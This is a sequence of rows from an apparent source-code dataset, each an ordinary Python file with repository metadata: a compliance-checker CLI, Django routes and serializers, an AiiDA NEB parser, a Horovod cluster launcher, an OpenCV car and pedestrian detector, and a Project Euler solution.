" formats is that the 'json' format has the check as the top level"
" key, whereas the 'json_new' format has the dataset name(s) as the"
" main key in the output follow by any checks as subkeys. Also, "
"'json' format can be only be run against one input file, whereas "
"'json_new' can be run against multiple files."))
parser.add_argument('-o', '--output', default=[], action='append',
help=("Output filename(s). If '-' is supplied, output to stdout."
" Can either be one or many files. If one file is supplied,"
" but the checker is run against many files, all the output"
" from the checks goes to that file (does not presently work "
"with 'json' format). If more than one output file is "
"supplied, the number of input datasets supplied must match "
"the number of output files."))
parser.add_argument('-V', '--version', action='store_true',
help='Display the IOOS Compliance Checker version information.')
parser.add_argument('dataset_location', nargs='*',
help="Defines the location of the dataset to be checked.")
parser.add_argument('-l', '--list-tests', action='store_true',
help='List the available tests')
parser.add_argument('-d', '--download-standard-names',
help=("Specify a version of the cf standard name table"
" to download as packaged version"))
args = parser.parse_args()
if args.version:
print("IOOS compliance checker version %s" % __version__)
return 0
if args.list_tests:
print("IOOS compliance checker available checker suites:")
for checker in sorted(check_suite.checkers.keys()):
version = getattr(check_suite.checkers[checker],
'_cc_checker_version', "???")
if args.verbose:
print(" - {} (v{})".format(checker, version))
elif ':' in checker and not checker.endswith(':latest'): # Skip the "latest" output
print(" - {}".format(checker))
return 0
if args.download_standard_names:
download_cf_standard_name_table(args.download_standard_names)
# Check the number of output files
if not args.output:
args.output = '-'
output_len = len(args.output)
if not (output_len == 1 or output_len == len(args.dataset_location)):
print('The number of output files must either be one or the same as the number of datasets', file=sys.stderr)
sys.exit(2)
# Check the output formats
format_choices = ['text', 'html', 'json', 'json_new']
for out_format in args.format:
if out_format not in format_choices:
print(("Error: argument -f/--format: invalid choice: '{}'"
" (choose from 'text', 'html', 'json', 'json_new')".format(out_format)))
sys.exit(2)
# Run the compliance checker
# 2 modes, concatenated output file or multiple output files
return_values = []
had_errors = []
if output_len == 1:
if args.format != 'json':
print("Running Compliance Checker on the datasets from: {}".format(args.dataset_location), file=sys.stderr)
return_value, errors = ComplianceChecker.run_checker(args.dataset_location,
args.test or ['acdd'],
args.verbose,
args.criteria,
args.skip_checks,
args.output[0],
args.format or ['text'])
return_values.append(return_value)
had_errors.append(errors)
else:
for output, dataset in zip(args.output, args.dataset_location):
if args.format != 'json':
print("Running Compliance Checker on the dataset from: {}".format(dataset), file=sys.stderr)
return_value, errors = ComplianceChecker.run_checker([dataset],
args.test or ['acdd'],
args.verbose,
args.criteria,
args.skip_checks,
output,
args.format or ['text'])
return_values.append(return_value)
had_errors.append(errors)
if any(had_errors):
return 2
if all(return_values):
return 0
return 1
if __name__ == "__main__":
sys.exit(main())
| 48.841379
| 119
| 0.515391
| 730
| 7,082
| 4.867123
| 0.256164
| 0.025331
| 0.047847
| 0.016043
| 0.192232
| 0.126091
| 0.126091
| 0.126091
| 0.126091
| 0.094005
| 0
| 0.002762
| 0.386614
| 7,082
| 144
| 120
| 49.180556
| 0.815147
| 0.031629
| 0
| 0.182609
| 0
| 0
| 0.305357
| 0.00759
| 0
| 0
| 0
| 0
| 0
| 1
| 0.008696
| false
| 0
| 0.052174
| 0
| 0.104348
| 0.078261
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60cf079213b806efdae39b46a5d5e92189e230e8
| 1,404
|
py
|
Python
|
student/urls.py
|
rummansadik/Admission-Automation
|
a2fd305644cf60bfd0a381b855fb8c2810507f36
|
[
"MIT"
] | null | null | null |
student/urls.py
|
rummansadik/Admission-Automation
|
a2fd305644cf60bfd0a381b855fb8c2810507f36
|
[
"MIT"
] | null | null | null |
student/urls.py
|
rummansadik/Admission-Automation
|
a2fd305644cf60bfd0a381b855fb8c2810507f36
|
[
"MIT"
] | null | null | null |
from django.contrib.auth.views import LoginView
from django.urls import path
from student import views
urlpatterns = [
path('studentclick', views.studentclick_view, name='student-click'),
path('studentlogin', LoginView.as_view(
template_name='student/studentlogin.html'), name='studentlogin'),
path('studentsignup', views.student_signup_view, name='studentsignup'),
path('student-dashboard', views.student_dashboard_view,
name='student-dashboard'),
path('student-check', views.student_check_view, name='student-check'),
path('student-exam', views.student_exam_view, name='student-exam'),
path('take-exam/<int:pk>', views.take_exam_view, name='take-exam'),
path('start-exam/<int:pk>', views.start_exam_view, name='start-exam'),
path('calculate-marks', views.calculate_marks_view, name='calculate-marks'),
path('view-result', views.view_result_view, name='view-result'),
path('check-marks/<int:pk>', views.check_marks_view, name='check-marks'),
path('student-marks', views.student_marks_view, name='student-marks'),
path('expel/<int:pk>', views.student_expel_view, name='expel'),
path('video_feed', views.video_feed, name='video-feed'),
path('train_feed', views.train_feed, name='train-feed'),
path('check_feed', views.check_feed, name='check-feed'),
path('logout', views.student_logout_view, name='student-logout'),
]
| 52
| 80
| 0.718661
| 187
| 1,404
| 5.219251
| 0.192513
| 0.106557
| 0.092213
| 0.028689
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.110399
| 1,404
| 26
| 81
| 54
| 0.781425
| 0
| 0
| 0
| 0
| 0
| 0.319088
| 0.017806
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.125
| 0
| 0.125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60cfe2b25e1fd15d3b1f9eec1ded9e4ee805612a
| 10,381
|
py
|
Python
|
aiida_quantumespresso/parsers/neb.py
|
lin-cp/aiida-quantumespresso
|
55f2bc8c137a69be24709a119bc285c700997907
|
[
"MIT"
] | null | null | null |
aiida_quantumespresso/parsers/neb.py
|
lin-cp/aiida-quantumespresso
|
55f2bc8c137a69be24709a119bc285c700997907
|
[
"MIT"
] | null | null | null |
aiida_quantumespresso/parsers/neb.py
|
lin-cp/aiida-quantumespresso
|
55f2bc8c137a69be24709a119bc285c700997907
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from aiida.common import NotExistent
from aiida.orm import Dict
from aiida_quantumespresso.calculations.pw import PwCalculation
from aiida_quantumespresso.parsers import QEOutputParsingError
from aiida_quantumespresso.parsers.parse_raw import convert_qe_to_aiida_structure
from aiida_quantumespresso.parsers.parse_raw.neb import parse_raw_output_neb
from aiida_quantumespresso.parsers.parse_raw.pw import parse_stdout as parse_pw_stdout
from aiida_quantumespresso.parsers.parse_raw.pw import reduce_symmetries
from aiida_quantumespresso.parsers.parse_xml.exceptions import XMLParseError, XMLUnsupportedFormatError
from aiida_quantumespresso.parsers.parse_xml.pw.parse import parse_xml as parse_pw_xml
from aiida_quantumespresso.parsers.pw import PwParser
from .base import Parser
class NebParser(Parser):
"""`Parser` implementation for the `NebCalculation` calculation job class."""
def parse(self, **kwargs):
"""Parse the retrieved files of a completed `NebCalculation` into output nodes.
Two nodes that are expected are the default 'retrieved' `FolderData` node which will store the retrieved files
permanently in the repository. The second required node is a filepath under the key `retrieved_temporary_files`
which should contain the temporary retrieved files.
"""
import os
from aiida.orm import ArrayData, TrajectoryData
import numpy
PREFIX = self.node.process_class._PREFIX
retrieved = self.retrieved
list_of_files = retrieved.list_object_names() # Note: this includes folders, but not the files they contain.
# The stdout is required for parsing
filename_stdout = self.node.get_attribute('output_filename')
if filename_stdout not in list_of_files:
return self.exit(self.exit_codes.ERROR_OUTPUT_STDOUT_READ)
# Look for optional settings input node and potential 'parser_options' dictionary within it
# Note that we look for both NEB and PW parser options under "inputs.settings.parser_options";
# we don't even have a namespace "inputs.pw.settings".
try:
settings = self.node.inputs.settings.get_dict()
parser_options = settings[self.get_parser_settings_key()]
except (AttributeError, KeyError, NotExistent):
settings = {}
parser_options = {}
# load the pw input parameters dictionary
pw_input_dict = self.node.inputs.pw__parameters.get_dict()
# load the neb input parameters dictionary
neb_input_dict = self.node.inputs.parameters.get_dict()
# First parse the Neb output
try:
stdout = retrieved.get_object_content(filename_stdout)
neb_out_dict, iteration_data, raw_successful = parse_raw_output_neb(stdout, neb_input_dict)
# TODO: why do we ignore raw_successful ?
except (OSError, QEOutputParsingError):
return self.exit(self.exit_codes.ERROR_OUTPUT_STDOUT_READ)
for warn_type in ['warnings', 'parser_warnings']:
for message in neb_out_dict[warn_type]:
self.logger.warning(f'parsing NEB output: {message}')
if 'QE neb run did not reach the end of the execution.' in neb_out_dict['parser_warnings']:
return self.exit(self.exit_codes.ERROR_OUTPUT_STDOUT_INCOMPLETE)
# Retrieve the number of images
try:
num_images = neb_input_dict['num_of_images']
except KeyError:
try:
num_images = neb_out_dict['num_of_images']
except KeyError:
return self.exit(self.exit_codes.ERROR_OUTPUT_STDOUT_PARSE)
if num_images < 2:
return self.exit(self.exit_codes.ERROR_OUTPUT_STDOUT_PARSE)
# Now parse the information from the individual pw calculations for the different images
image_data = {}
positions = []
cells = []
# for each image...
for i in range(num_images):
# check if any of the known XML output file names are present, and parse the first that we find
relative_output_folder = os.path.join(f'{PREFIX}_{i + 1}', f'{PREFIX}.save')
retrieved_files = self.retrieved.list_object_names(relative_output_folder)
for xml_filename in PwCalculation.xml_filenames:
if xml_filename in retrieved_files:
xml_file_path = os.path.join(relative_output_folder, xml_filename)
try:
with retrieved.open(xml_file_path) as xml_file:
parsed_data_xml, logs_xml = parse_pw_xml(xml_file, None)
except IOError:
return self.exit(self.exit_codes.ERROR_OUTPUT_XML_READ)
except XMLParseError:
return self.exit(self.exit_codes.ERROR_OUTPUT_XML_PARSE)
except XMLUnsupportedFormatError:
return self.exit(self.exit_codes.ERROR_OUTPUT_XML_FORMAT)
except Exception as exc:
import traceback
traceback.print_exc()
return self.exit(self.exit_codes.ERROR_UNEXPECTED_PARSER_EXCEPTION.format(exception=exc))
# this image is dealt with, so break the inner loop and go to the next image
break
# otherwise, if none of the filenames we tried exists, exit with an error
else:
return self.exit(self.exit_codes.ERROR_MISSING_XML_FILE)
# look for pw output and parse it
pw_out_file = os.path.join(f'{PREFIX}_{i + 1}', 'PW.out')
try:
with retrieved.open(pw_out_file, 'r') as f:
pw_out_text = f.read() # Note: read() and not readlines()
except IOError:
return self.exit(self.exit_codes.ERROR_OUTPUT_STDOUT_READ)
try:
parsed_data_stdout, logs_stdout = parse_pw_stdout(
pw_out_text, pw_input_dict, parser_options, parsed_data_xml
)
except Exception as exc:
return self.exit(self.exit_codes.ERROR_UNEXPECTED_PARSER_EXCEPTION.format(exception=exc))
parsed_structure = parsed_data_stdout.pop('structure', {})
parsed_trajectory = parsed_data_stdout.pop('trajectory', {})
parsed_parameters = PwParser.build_output_parameters(parsed_data_xml, parsed_data_stdout)
# Explicit information about k-points does not need to be queryable so we remove it from the parameters
parsed_parameters.pop('k_points', None)
parsed_parameters.pop('k_points_units', None)
parsed_parameters.pop('k_points_weights', None)
# Delete bands # TODO: this is just to make pytest happy; do we want to keep them instead?
parsed_parameters.pop('bands', None)
# Append the last frame of some of the smaller trajectory arrays to the parameters for easy querying
PwParser.final_trajectory_frame_to_parameters(parsed_parameters, parsed_trajectory)
# If the parser option 'all_symmetries' is False, we reduce the raw parsed symmetries to save space
all_symmetries = False if parser_options is None else parser_options.get('all_symmetries', False)
if not all_symmetries and 'cell' in parsed_structure:
reduce_symmetries(parsed_parameters, parsed_structure, self.logger)
structure_data = convert_qe_to_aiida_structure(parsed_structure)
key = f'pw_output_image_{i + 1}'
image_data[key] = parsed_parameters
positions.append([site.position for site in structure_data.sites])
cells.append(structure_data.cell)
# Add also PW warnings and errors to the neb output data, avoiding repetitions.
for log_type in ['warning', 'error']:
for message in logs_stdout[log_type]:
formatted_message = f'{log_type}: {message}'
if formatted_message not in neb_out_dict['warnings']:
neb_out_dict['warnings'].append(formatted_message)
# Symbols can be obtained simply from the last image
symbols = [str(site.kind_name) for site in structure_data.sites]
output_params = Dict(dict=dict(list(neb_out_dict.items()) + list(image_data.items())))
self.out('output_parameters', output_params)
trajectory = TrajectoryData()
trajectory.set_trajectory(
stepids=numpy.arange(1, num_images + 1),
cells=numpy.array(cells),
symbols=symbols,
positions=numpy.array(positions),
)
self.out('output_trajectory', trajectory)
if parser_options is not None and parser_options.get('all_iterations', False):
if iteration_data:
arraydata = ArrayData()
for k, v in iteration_data.items():
arraydata.set_array(k, numpy.array(v))
self.out('iteration_array', arraydata)
# Load the original and interpolated energy profile along the minimum-energy path (mep)
try:
filename = PREFIX + '.dat'
with retrieved.open(filename, 'r') as handle:
mep = numpy.loadtxt(handle)
except Exception:
self.logger.warning(f'could not open expected output file `{filename}`.')
mep = numpy.array([[]])
try:
filename = PREFIX + '.int'
with retrieved.open(filename, 'r') as handle:
interp_mep = numpy.loadtxt(handle)
except Exception:
self.logger.warning(f'could not open expected output file `{filename}`.')
interp_mep = numpy.array([[]])
# Create an ArrayData with the energy profiles
mep_arraydata = ArrayData()
mep_arraydata.set_array('mep', mep)
mep_arraydata.set_array('interpolated_mep', interp_mep)
self.out('output_mep', mep_arraydata)
return
@staticmethod
def get_parser_settings_key():
"""Return the key that contains the optional parser options in the `settings` input node."""
return 'parser_options'
| 47.619266
| 119
| 0.652731
| 1,269
| 10,381
| 5.117415
| 0.224586
| 0.029566
| 0.02587
| 0.033261
| 0.224361
| 0.205574
| 0.155066
| 0.133816
| 0.119341
| 0.099476
| 0
| 0.00093
| 0.275311
| 10,381
| 217
| 120
| 47.83871
| 0.862289
| 0.202485
| 0
| 0.190476
| 0
| 0
| 0.07021
| 0
| 0
| 0
| 0
| 0.004608
| 0
| 1
| 0.013605
| false
| 0
| 0.108844
| 0
| 0.22449
| 0.006803
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60d008a523955b3331abaa74c2b768ea0d2cf905
| 6,942
|
py
|
Python
|
training/horovod/base/horovod_wrapper.py
|
thehardikv/ai-platform-samples
|
0050d12476bcbfdb99d9894a3755a97da5cd80fe
|
[
"Apache-2.0"
] | 418
|
2019-06-26T05:55:42.000Z
|
2022-03-31T10:46:57.000Z
|
training/horovod/base/horovod_wrapper.py
|
thehardikv/ai-platform-samples
|
0050d12476bcbfdb99d9894a3755a97da5cd80fe
|
[
"Apache-2.0"
] | 362
|
2019-06-26T20:41:17.000Z
|
2022-02-10T16:02:16.000Z
|
training/horovod/base/horovod_wrapper.py
|
thehardikv/ai-platform-samples
|
0050d12476bcbfdb99d9894a3755a97da5cd80fe
|
[
"Apache-2.0"
] | 229
|
2019-06-29T17:55:33.000Z
|
2022-03-14T15:52:58.000Z
|
import collections
import datetime
import json
import multiprocessing
import os
import subprocess
import sys
import time
_SSHD_BINARY_PATH = "/usr/sbin/sshd"
EnvironmentConfig = collections.namedtuple(
"EnvironmentConfig",
["hosts", "port", "is_chief", "pools", "job_id"])
class DeadlineExceededError(Exception):
"""Indicates an action took too long."""
pass
def _sub_process_num_gpus(unused):
del unused
# This is imported here so that we don't load tensorflow in the parent
# process. Once the sub-process exits, it releases its allocated GPU memory.
from tensorflow.python.client import device_lib
local_device_protos = device_lib.list_local_devices()
gpus = [x.name for x in local_device_protos if x.device_type == "GPU"]
return len(gpus)
def _get_available_gpus():
"""Returns the number of GPUs on the machine."""
pool = multiprocessing.Pool(1)
result = pool.map(_sub_process_num_gpus, [None])[0]
pool.close()
pool.join()
return result
def parse_environment_config(env_config_str, job_id):
"""Parses environment config and returns a list of hosts as well as the role.
Returns:
An EnvironmentConfig.
"""
if env_config_str:
ssh_port = -1
env_config_json = json.loads(env_config_str)
cluster = env_config_json.get("cluster")
if not cluster:
return None, True
hosts = []
pools = collections.defaultdict(list)
for pool_type, tasks_per_type in cluster.items():
if pool_type == "master":
pool_type = "chief"
for host_and_port in tasks_per_type:
host, port = host_and_port.split(":")
if host == "127.0.0.1":
host = "localhost"
port = int(port)
if ssh_port == -1:
ssh_port = port
elif ssh_port != port:
raise ValueError("Inconsistent ssh ports across tasks %d != %d." %
(ssh_port, port))
hosts.append(host)
pools[pool_type].append(host)
is_chief = False
has_chief = "chief" in pools
if (env_config_json["task"]["type"] == "master" or
env_config_json["task"]["type"] == "chief"):
is_chief = True
if int(env_config_json["task"]["index"]) != 0:
raise ValueError("Only one master node is expected.")
elif ((not has_chief) and
(env_config_json["task"]["type"] == "worker") and
int(env_config_json["task"]["index"]) == 0):
is_chief = True
pools["chief"].append(pools["worker"].pop(0))
elif env_config_json["task"]["type"] != "worker":
raise ValueError("Unexpected task type for Horovod training: %s." %
env_config_json["task"]["type"])
return EnvironmentConfig(hosts=hosts, port=port, is_chief=is_chief,
pools=pools, job_id=job_id)
else:
return EnvironmentConfig(hosts=["localhost"], port=2222, is_chief=True,
pools={"chief": ["localhost"]}, job_id=job_id)
def start_ssh_server(port, is_chief):
ssh_server_command = [_SSHD_BINARY_PATH, "-p", str(port)]
if not is_chief:
ssh_server_command.append("-D")
completed = subprocess.call(ssh_server_command)
if completed != 0:
raise OSError("SSH server did not start successfully.")
def wait_for_ssh_servers(hosts, port, timeout_seconds):
deadline_datetime = datetime.datetime.utcnow() + datetime.timedelta(
seconds=timeout_seconds)
unavailable_hosts = []
while datetime.datetime.utcnow() < deadline_datetime:
unavailable_hosts = []
for host in hosts:
ssh_command = ["ssh", "-q", host, "-p", str(port), "true"]
result = subprocess.call(ssh_command)
if result != 0:
unavailable_hosts.append(host)
if not unavailable_hosts:
return
# Retry in 1 second.
time.sleep(1)
raise DeadlineExceededError(
"Timed out while waiting for all hosts to start. "
"Hosts still not available: %s. TASK_STARTUP_TIMEOUT_SECONDS=%d" %
(unavailable_hosts, timeout_seconds))
def run_horovod(env_config, jobs_per_host, args):
env = dict(os.environ)
del env["TF_CONFIG"]
num_jobs = len(env_config.hosts) * jobs_per_host
hosts = ",".join("%s:%d" % (h, jobs_per_host) for h in env_config.hosts)
horovod_command = [
"horovodrun", "--ssh-port", str(env_config.port), "-H",
hosts, "--num-proc", str(num_jobs)
]
horovod_command.extend(args)
exit_code = subprocess.call(horovod_command, env=env)
return exit_code
def benchmark_network(env_config):
if not env_config.pools["worker"]:
raise ValueError("No workers in the pool to do network benchmarking.")
iperf_server = ["iperf", "-s", "-p", "6000"]
server = subprocess.Popen(iperf_server)
# Wait 10 seconds for the local server to start.
time.sleep(10)
iperf_command = ["ssh", "-q", env_config.pools["worker"][0], "-p",
str(env_config.port),
"iperf", "-p", "6000", "-c", env_config.pools["chief"][0]]
subprocess.call(iperf_command)
server.kill()
def copy_files_recursively(src, dest):
if not dest.startswith("gs://"):
try:
os.makedirs(dest)
except OSError:
pass
copy_cmd = ["gsutil", "-m", "rsync", "-r", src, dest]
exit_code = subprocess.call(copy_cmd)
if exit_code != 0:
raise RuntimeError("Error while copying %s to %s" % (src, dest))
return exit_code
def main():
env_config_str = os.environ.get("TF_CONFIG")
job_id = os.environ.get("CLOUD_ML_JOB_ID", "localrun")
env_config = parse_environment_config(env_config_str, job_id)
print (env_config, env_config.pools, env_config.hosts, os.environ)
if os.environ.get("STAGE_GCS_PATH", False):
copy_files_recursively(
os.environ.get("STAGE_GCS_PATH"),
os.environ.get("STAGING_DIR", "/input"))
start_ssh_server(env_config.port, env_config.is_chief)
max_num_retries = os.environ.get("NUM_HOROVOD_RETRIES", 1)
if env_config.is_chief:
exit_code = 0
for retry in range(max_num_retries):
staging_timeout_seconds = int(
os.environ.get("TASK_STARTUP_TIMEOUT_SECONDS", 600))
wait_for_ssh_servers(env_config.hosts, env_config.port,
staging_timeout_seconds)
if os.environ.get("BENCHMARK_NETWORK", False):
benchmark_network(env_config)
num_gpus = _get_available_gpus()
# If there are no GPUs, we can just run single process per machine.
jobs_per_host = max(1, num_gpus)
args = sys.argv[1:]
exit_code = run_horovod(env_config=env_config, jobs_per_host=jobs_per_host,
args=args)
if exit_code == 0:
break
else:
print ("Retrying...", retry, "out of", max_num_retries)
if os.environ.get("GCS_OUTPUT_PATH", False):
copy_files_recursively(
os.environ.get("OUTPUT_DIR", "/output"),
os.path.join(os.environ.get("GCS_OUTPUT_PATH"), job_id))
sys.exit(exit_code)
if __name__ == "__main__":
main()
| 33.699029
| 81
| 0.659896
| 951
| 6,942
| 4.569926
| 0.249211
| 0.07248
| 0.030373
| 0.027382
| 0.123102
| 0.079153
| 0.04878
| 0.036815
| 0
| 0
| 0
| 0.008069
| 0.214492
| 6,942
| 205
| 82
| 33.863415
| 0.788924
| 0.066695
| 0
| 0.072727
| 0
| 0
| 0.141662
| 0.009144
| 0
| 0
| 0
| 0
| 0
| 1
| 0.054545
| false
| 0.012121
| 0.054545
| 0
| 0.163636
| 0.012121
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60d5e102f224ce9da90306668a9ad7d31fe50111
| 1,332
|
py
|
Python
|
car & pedestrian_tracker.py
|
Ishita-2001/Car-And-Pedestrian-prediction
|
6c4aeca84ae49d40ff6d27e51800c6f50db55070
|
[
"MIT"
] | 1
|
2022-01-05T13:26:26.000Z
|
2022-01-05T13:26:26.000Z
|
car & pedestrian_tracker.py
|
Ishita-2001/Car-And-Pedestrian-prediction
|
6c4aeca84ae49d40ff6d27e51800c6f50db55070
|
[
"MIT"
] | null | null | null |
car & pedestrian_tracker.py
|
Ishita-2001/Car-And-Pedestrian-prediction
|
6c4aeca84ae49d40ff6d27e51800c6f50db55070
|
[
"MIT"
] | null | null | null |
import cv2
video=cv2.VideoCapture(r'C:\Users\ISHITA\Desktop\ML project\UEM_PROJECT_COM\pedestrian.mp4')
#pre trained pedestrian and car classifier
car_tracker_file=(r'C:\Users\ISHITA\Desktop\ML project\UEM_PROJECT_COM\car.xml')
pedestrian_tracker_file=(r'C:\Users\ISHITA\Desktop\ML project\UEM_PROJECT_COM\pedestrian.xml')
#create car n pedestrian classifier
car_tracker=cv2.CascadeClassifier(car_tracker_file)
pedestrian_tracker=cv2.CascadeClassifier(pedestrian_tracker_file)
#run forever untill car stop
while True:
(read_successful,frame)=video.read()
gr_frame=cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)
#detect cars n pedestrian
cars=car_tracker.detectMultiScale(gr_frame)
pedestrians=pedestrian_tracker.detectMultiScale(gr_frame)
#draw rectangle around cars
for(x,y,w,h) in cars:
cv2.rectangle(frame,(x+1,y+2),(x+w,y+h),(255,0,0),2)
cv2.rectangle(frame,(x,y),(x+w,y+h),(0,0,255),2)
#draw rectangle around pedestrian
for(x,y,w,h) in pedestrians:
cv2.rectangle(frame,(x,y),(x+w,y+h),(0,255,255),2)
#display
cv2.imshow('car n pedestrians',frame)
key = cv2.waitKey(1)
#stopping condition
if key == 83 or key== 115:
break
# release the VideoCapture object
video.release()
print('Press "s" to stop')
print('Hey!')
| 28.340426
| 94
| 0.712462
| 204
| 1,332
| 4.539216
| 0.367647
| 0.043197
| 0.022678
| 0.042117
| 0.2527
| 0.2527
| 0.233261
| 0.233261
| 0.233261
| 0.233261
| 0
| 0.036348
| 0.153153
| 1,332
| 46
| 95
| 28.956522
| 0.784574
| 0.180931
| 0
| 0
| 0
| 0
| 0.208872
| 0.17098
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.043478
| 0
| 0.043478
| 0.086957
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60d7aa6b6e26e469afd18baf5e09fc751d3bc828
| 1,658
|
py
|
Python
|
saleor/wing/api/serializers.py
|
glosoftgroup/tenants
|
a6b229ad1f6d567b7078f83425a532830b71e1bb
|
[
"BSD-3-Clause"
] | 1
|
2018-05-03T06:17:02.000Z
|
2018-05-03T06:17:02.000Z
|
saleor/wing/api/serializers.py
|
glosoftgroup/tenants
|
a6b229ad1f6d567b7078f83425a532830b71e1bb
|
[
"BSD-3-Clause"
] | 8
|
2018-05-07T16:42:35.000Z
|
2022-02-26T03:31:56.000Z
|
saleor/wing/api/serializers.py
|
glosoftgroup/tenants
|
a6b229ad1f6d567b7078f83425a532830b71e1bb
|
[
"BSD-3-Clause"
] | null | null | null |
# site settings rest api serializers
from rest_framework import serializers
from saleor.wing.models import Wing as Table
class TableListSerializer(serializers.ModelSerializer):
update_url = serializers.HyperlinkedIdentityField(view_name='wing:api-update')
delete_url = serializers.HyperlinkedIdentityField(view_name='wing:api-delete')
text = serializers.SerializerMethodField()
class Meta:
model = Table
fields = ('id',
'name',
'text',
'description',
'update_url',
'delete_url'
)
def get_text(self, obj):
try:
return obj.name
except:
return ''
class CreateListSerializer(serializers.ModelSerializer):
class Meta:
model = Table
fields = ('id',
'name',
'description',
)
def create(self, validated_data):
instance = Table()
instance.name = validated_data.get('name')
if validated_data.get('description'):
instance.description = validated_data.get('description')
instance.save()
return instance
class UpdateSerializer(serializers.ModelSerializer):
class Meta:
model = Table
fields = ('id',
'name',
'description',
)
def update(self, instance, validated_data):
instance.name = validated_data.get('name', instance.name)
instance.description = validated_data.get('description', instance.description)
instance.save()
return instance
| 27.180328
| 86
| 0.581423
| 145
| 1,658
| 6.544828
| 0.303448
| 0.09589
| 0.084299
| 0.060063
| 0.561644
| 0.515279
| 0.407798
| 0.149631
| 0.149631
| 0.149631
| 0
| 0
| 0.3269
| 1,658
| 60
| 87
| 27.633333
| 0.850358
| 0.020507
| 0
| 0.413043
| 0
| 0
| 0.090012
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.065217
| false
| 0
| 0.043478
| 0
| 0.391304
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60d8e5a0116e064e77e230eb96c9a8d6cada4db5
| 525
|
py
|
Python
|
project_euler/problem_01/sol6.py
|
mudit-chopra/Python
|
5d186f16d1f6d497c95c28c0ced7134314f65168
|
[
"MIT"
] | null | null | null |
project_euler/problem_01/sol6.py
|
mudit-chopra/Python
|
5d186f16d1f6d497c95c28c0ced7134314f65168
|
[
"MIT"
] | null | null | null |
project_euler/problem_01/sol6.py
|
mudit-chopra/Python
|
5d186f16d1f6d497c95c28c0ced7134314f65168
|
[
"MIT"
] | null | null | null |
'''
Problem Statement:
If we list all the natural numbers below 10 that are multiples of 3 or 5,
we get 3,5,6 and 9. The sum of these multiples is 23.
Find the sum of all the multiples of 3 or 5 below N.
'''
from __future__ import print_function
try:
raw_input # Python 2
except NameError:
raw_input = input # Python 3
'''store multiples of 3 and 5 in a set and then add'''
n = int(input().strip())
l = set()
x = 3
y = 5
while(x<n):
l.add(x)
x+=3
while(y<n):
l.add(y)
y+=5
print(sum(l))
| 21
| 73
| 0.638095
| 103
| 525
| 3.184466
| 0.504854
| 0.10061
| 0.109756
| 0.085366
| 0.091463
| 0
| 0
| 0
| 0
| 0
| 0
| 0.050761
| 0.249524
| 525
| 24
| 74
| 21.875
| 0.781726
| 0.415238
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.0625
| 0
| 0.0625
| 0.125
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60d91e2f9fc2f2ed156791ead05310dd7eaf0d26
| 2,017
|
py
|
Python
|
jsonfallback/functions.py
|
laymonage/django-jsonfallback
|
6e70edd2dbab7d74230e4af48d160ea8c6a663fb
|
[
"Apache-2.0"
] | null | null | null |
jsonfallback/functions.py
|
laymonage/django-jsonfallback
|
6e70edd2dbab7d74230e4af48d160ea8c6a663fb
|
[
"Apache-2.0"
] | 2
|
2019-05-31T23:46:05.000Z
|
2019-06-02T06:54:54.000Z
|
jsonfallback/functions.py
|
laymonage/django-jsonfallback
|
6e70edd2dbab7d74230e4af48d160ea8c6a663fb
|
[
"Apache-2.0"
] | null | null | null |
import copy
from django.db import NotSupportedError
from django.db.models import Expression
from .fields import mysql_compile_json_path, postgres_compile_json_path, FallbackJSONField
class JSONExtract(Expression):
def __init__(self, expression, *path, output_field=FallbackJSONField(), **extra):
super().__init__(output_field=output_field)
self.path = path
self.source_expression = self._parse_expressions(expression)[0]
self.extra = extra
def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False, for_save=False):
c = self.copy()
c.is_summary = summarize
c.source_expression = c.source_expression.resolve_expression(query, allow_joins, reuse, summarize, for_save)
return c
def as_postgresql(self, compiler, connection, function=None, template=None, arg_joiner=None, **extra_context):
params = []
